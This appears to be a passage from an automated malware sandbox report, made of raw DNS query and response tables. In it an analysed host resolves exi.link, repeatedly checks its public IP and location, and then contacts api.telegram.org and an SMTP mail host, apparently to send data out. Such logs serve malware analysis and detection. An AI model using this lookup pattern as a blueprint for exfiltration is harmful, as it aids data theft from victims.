                                    Aug 13, 2024 20:25:57.164316893 CEST53616018.8.8.8192.168.2.22
                                    Aug 13, 2024 20:25:57.246228933 CEST5461553192.168.2.228.8.8.8
                                    Aug 13, 2024 20:25:57.252751112 CEST53546158.8.8.8192.168.2.22
                                    Aug 13, 2024 20:25:57.992083073 CEST5495053192.168.2.228.8.8.8
                                    Aug 13, 2024 20:25:57.999084949 CEST53549508.8.8.8192.168.2.22
                                    Aug 13, 2024 20:25:58.558823109 CEST6421553192.168.2.228.8.8.8
                                    Aug 13, 2024 20:25:58.568182945 CEST53642158.8.8.8192.168.2.22
                                    Aug 13, 2024 20:25:59.186825991 CEST5960453192.168.2.228.8.8.8
                                    Aug 13, 2024 20:25:59.193537951 CEST53596048.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:01.135977030 CEST4952053192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:01.142604113 CEST53495208.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:01.142760038 CEST4952053192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:01.149301052 CEST53495208.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:02.391017914 CEST5303153192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:02.399425030 CEST53530318.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:02.399689913 CEST5303153192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:02.406886101 CEST53530318.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:02.578123093 CEST5311253192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:02.584681988 CEST53531128.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:02.584889889 CEST5311253192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:02.591463089 CEST53531128.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:04.189760923 CEST6508053192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:04.602960110 CEST53650808.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:04.603529930 CEST6508053192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:04.615492105 CEST53650808.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:06.471883059 CEST5070253192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:06.478807926 CEST53507028.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:07.588172913 CEST5308953192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:07.595563889 CEST53530898.8.8.8192.168.2.22
                                    Aug 13, 2024 20:26:07.596234083 CEST5308953192.168.2.228.8.8.8
                                    Aug 13, 2024 20:26:07.606969118 CEST53530898.8.8.8192.168.2.22
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 13, 2024 20:24:23.851072073 CEST192.168.2.228.8.8.80x9546Standard query (0)exi.linkA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:25.899049997 CEST192.168.2.228.8.8.80x949bStandard query (0)exi.linkA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:26.015203953 CEST192.168.2.228.8.8.80x949bStandard query (0)exi.linkA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.752731085 CEST192.168.2.228.8.8.80xdfa0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.788157940 CEST192.168.2.228.8.8.80x39d8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:48.524105072 CEST192.168.2.228.8.8.80xb260Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.571954966 CEST192.168.2.228.8.8.80xf6c8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.592122078 CEST192.168.2.228.8.8.80xec2dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.125622988 CEST192.168.2.228.8.8.80x66eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.135973930 CEST192.168.2.228.8.8.80x66eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.963690996 CEST192.168.2.228.8.8.80x88bbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.989589930 CEST192.168.2.228.8.8.80x54adStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:53.530621052 CEST192.168.2.228.8.8.80x8fbStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.294713974 CEST192.168.2.228.8.8.80x41caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.351703882 CEST192.168.2.228.8.8.80xc249Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:55.201658010 CEST192.168.2.228.8.8.80xa5bcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:55.212641954 CEST192.168.2.228.8.8.80xa5bcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.040745020 CEST192.168.2.228.8.8.80xe24cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.294291019 CEST192.168.2.228.8.8.80xcad4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:57.110977888 CEST192.168.2.228.8.8.80x96d5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:57.118860006 CEST192.168.2.228.8.8.80x96d5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.473018885 CEST192.168.2.228.8.8.80xb8c1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.482403040 CEST192.168.2.228.8.8.80xe3c7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.615835905 CEST192.168.2.228.8.8.80xd009Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.628983021 CEST192.168.2.228.8.8.80x6585Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.187115908 CEST192.168.2.228.8.8.80xd396Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.196979046 CEST192.168.2.228.8.8.80xd396Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.645580053 CEST192.168.2.228.8.8.80xb953Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.986392021 CEST192.168.2.228.8.8.80xb80aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.999021053 CEST192.168.2.228.8.8.80x8ad2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.024751902 CEST192.168.2.228.8.8.80xe089Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.033708096 CEST192.168.2.228.8.8.80x6844Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:03.675632000 CEST192.168.2.228.8.8.80xa411Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.360281944 CEST192.168.2.228.8.8.80x3e24Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.371414900 CEST192.168.2.228.8.8.80xc961Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:13.239878893 CEST192.168.2.228.8.8.80x371Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.560997009 CEST192.168.2.228.8.8.80x483Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.571665049 CEST192.168.2.228.8.8.80x2bfcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:16.761531115 CEST192.168.2.228.8.8.80xe937Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.368634939 CEST192.168.2.228.8.8.80xefd7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.382538080 CEST192.168.2.228.8.8.80x935Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.213118076 CEST192.168.2.228.8.8.80xd529Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.956154108 CEST192.168.2.228.8.8.80xe96Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.970330954 CEST192.168.2.228.8.8.80x29c3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:20.677571058 CEST192.168.2.228.8.8.80x4138Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.325459957 CEST192.168.2.228.8.8.80x4e22Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.342654943 CEST192.168.2.228.8.8.80x2d0eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.769607067 CEST192.168.2.228.8.8.80xe327Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776324034 CEST192.168.2.228.8.8.80xe327Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.791349888 CEST192.168.2.228.8.8.80x9028Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.259041071 CEST192.168.2.228.8.8.80x8b59Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.911113024 CEST192.168.2.228.8.8.80xdb14Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.920073986 CEST192.168.2.228.8.8.80x40c5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927238941 CEST192.168.2.228.8.8.80x40c5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:30.792792082 CEST192.168.2.228.8.8.80x6010Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:31.901238918 CEST192.168.2.228.8.8.80x9ed0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.520418882 CEST192.168.2.228.8.8.80xb987Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.632304907 CEST192.168.2.228.8.8.80x7ab0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.644095898 CEST192.168.2.228.8.8.80xc204Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:36.772531033 CEST192.168.2.228.8.8.80xb2e7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:38.236653090 CEST192.168.2.228.8.8.80x7e58Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.119776964 CEST192.168.2.228.8.8.80x3aa7Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.283596039 CEST192.168.2.228.8.8.80x63d1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.227065086 CEST192.168.2.228.8.8.80x768dStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.432833910 CEST192.168.2.228.8.8.80x4073Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.596364975 CEST192.168.2.228.8.8.80x4073Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.182238102 CEST192.168.2.228.8.8.80x4f4eStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.208457947 CEST192.168.2.228.8.8.80x4f4eStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.445899963 CEST192.168.2.228.8.8.80xe50Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.536055088 CEST192.168.2.228.8.8.80xbfabStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.447683096 CEST192.168.2.228.8.8.80x283eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.501315117 CEST192.168.2.228.8.8.80xeb07Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.633430004 CEST192.168.2.228.8.8.80xae3eStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.979423046 CEST192.168.2.228.8.8.80xae3eStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.983417988 CEST192.168.2.228.8.8.80x8c1cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.156724930 CEST192.168.2.228.8.8.80xc200Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.246228933 CEST192.168.2.228.8.8.80x400Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.992083073 CEST192.168.2.228.8.8.80x283eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:58.558823109 CEST192.168.2.228.8.8.80xc07bStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:59.186825991 CEST192.168.2.228.8.8.80x829cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:01.135977030 CEST192.168.2.228.8.8.80xd63bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:01.142760038 CEST192.168.2.228.8.8.80xd63bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.391017914 CEST192.168.2.228.8.8.80x4286Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.399689913 CEST192.168.2.228.8.8.80x4286Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.578123093 CEST192.168.2.228.8.8.80xfe88Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.584889889 CEST192.168.2.228.8.8.80xfe88Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.189760923 CEST192.168.2.228.8.8.80x3bd0Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.603529930 CEST192.168.2.228.8.8.80x3bd0Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:06.471883059 CEST192.168.2.228.8.8.80xb1f3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:07.588172913 CEST192.168.2.228.8.8.80xc6e8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:07.596234083 CEST192.168.2.228.8.8.80xc6e8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 13, 2024 20:24:23.858613014 CEST8.8.8.8192.168.2.220x9546No error (0)exi.link159.203.133.15A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:25.961795092 CEST8.8.8.8192.168.2.220x949bNo error (0)exi.link159.203.133.15A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:26.025000095 CEST8.8.8.8192.168.2.220x949bNo error (0)exi.link159.203.133.15A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.759526014 CEST8.8.8.8192.168.2.220xdfa0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.759526014 CEST8.8.8.8192.168.2.220xdfa0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.759526014 CEST8.8.8.8192.168.2.220xdfa0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.759526014 CEST8.8.8.8192.168.2.220xdfa0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.759526014 CEST8.8.8.8192.168.2.220xdfa0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.759526014 CEST8.8.8.8192.168.2.220xdfa0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.794790030 CEST8.8.8.8192.168.2.220x39d8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.794790030 CEST8.8.8.8192.168.2.220x39d8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.794790030 CEST8.8.8.8192.168.2.220x39d8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.794790030 CEST8.8.8.8192.168.2.220x39d8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.794790030 CEST8.8.8.8192.168.2.220x39d8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:45.794790030 CEST8.8.8.8192.168.2.220x39d8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:48.534965038 CEST8.8.8.8192.168.2.220xb260No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:48.534965038 CEST8.8.8.8192.168.2.220xb260No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.578433990 CEST8.8.8.8192.168.2.220xf6c8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.578433990 CEST8.8.8.8192.168.2.220xf6c8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.578433990 CEST8.8.8.8192.168.2.220xf6c8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.578433990 CEST8.8.8.8192.168.2.220xf6c8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.578433990 CEST8.8.8.8192.168.2.220xf6c8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.578433990 CEST8.8.8.8192.168.2.220xf6c8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.598578930 CEST8.8.8.8192.168.2.220xec2dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.598578930 CEST8.8.8.8192.168.2.220xec2dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.598578930 CEST8.8.8.8192.168.2.220xec2dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.598578930 CEST8.8.8.8192.168.2.220xec2dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.598578930 CEST8.8.8.8192.168.2.220xec2dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:51.598578930 CEST8.8.8.8192.168.2.220xec2dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.135773897 CEST8.8.8.8192.168.2.220x66eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.135773897 CEST8.8.8.8192.168.2.220x66eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.142995119 CEST8.8.8.8192.168.2.220x66eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.142995119 CEST8.8.8.8192.168.2.220x66eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.970118046 CEST8.8.8.8192.168.2.220x88bbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.970118046 CEST8.8.8.8192.168.2.220x88bbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.970118046 CEST8.8.8.8192.168.2.220x88bbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.970118046 CEST8.8.8.8192.168.2.220x88bbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.970118046 CEST8.8.8.8192.168.2.220x88bbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.970118046 CEST8.8.8.8192.168.2.220x88bbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.996092081 CEST8.8.8.8192.168.2.220x54adNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.996092081 CEST8.8.8.8192.168.2.220x54adNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.996092081 CEST8.8.8.8192.168.2.220x54adNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.996092081 CEST8.8.8.8192.168.2.220x54adNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.996092081 CEST8.8.8.8192.168.2.220x54adNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:52.996092081 CEST8.8.8.8192.168.2.220x54adNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:53.541080952 CEST8.8.8.8192.168.2.220x8fbNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:53.541080952 CEST8.8.8.8192.168.2.220x8fbNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.301455021 CEST8.8.8.8192.168.2.220x41caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.301455021 CEST8.8.8.8192.168.2.220x41caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.301455021 CEST8.8.8.8192.168.2.220x41caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.301455021 CEST8.8.8.8192.168.2.220x41caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.301455021 CEST8.8.8.8192.168.2.220x41caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.301455021 CEST8.8.8.8192.168.2.220x41caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.358094931 CEST8.8.8.8192.168.2.220xc249No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.358094931 CEST8.8.8.8192.168.2.220xc249No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.358094931 CEST8.8.8.8192.168.2.220xc249No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.358094931 CEST8.8.8.8192.168.2.220xc249No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.358094931 CEST8.8.8.8192.168.2.220xc249No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:54.358094931 CEST8.8.8.8192.168.2.220xc249No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:55.212383032 CEST8.8.8.8192.168.2.220xa5bcNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:55.212383032 CEST8.8.8.8192.168.2.220xa5bcNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:55.220614910 CEST8.8.8.8192.168.2.220xa5bcNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:55.220614910 CEST8.8.8.8192.168.2.220xa5bcNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.047771931 CEST8.8.8.8192.168.2.220xe24cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.047771931 CEST8.8.8.8192.168.2.220xe24cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.047771931 CEST8.8.8.8192.168.2.220xe24cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.047771931 CEST8.8.8.8192.168.2.220xe24cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.047771931 CEST8.8.8.8192.168.2.220xe24cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.047771931 CEST8.8.8.8192.168.2.220xe24cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.300889969 CEST8.8.8.8192.168.2.220xcad4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.300889969 CEST8.8.8.8192.168.2.220xcad4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.300889969 CEST8.8.8.8192.168.2.220xcad4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.300889969 CEST8.8.8.8192.168.2.220xcad4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.300889969 CEST8.8.8.8192.168.2.220xcad4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:56.300889969 CEST8.8.8.8192.168.2.220xcad4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:57.118679047 CEST8.8.8.8192.168.2.220x96d5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:57.118679047 CEST8.8.8.8192.168.2.220x96d5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:57.126260042 CEST8.8.8.8192.168.2.220x96d5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
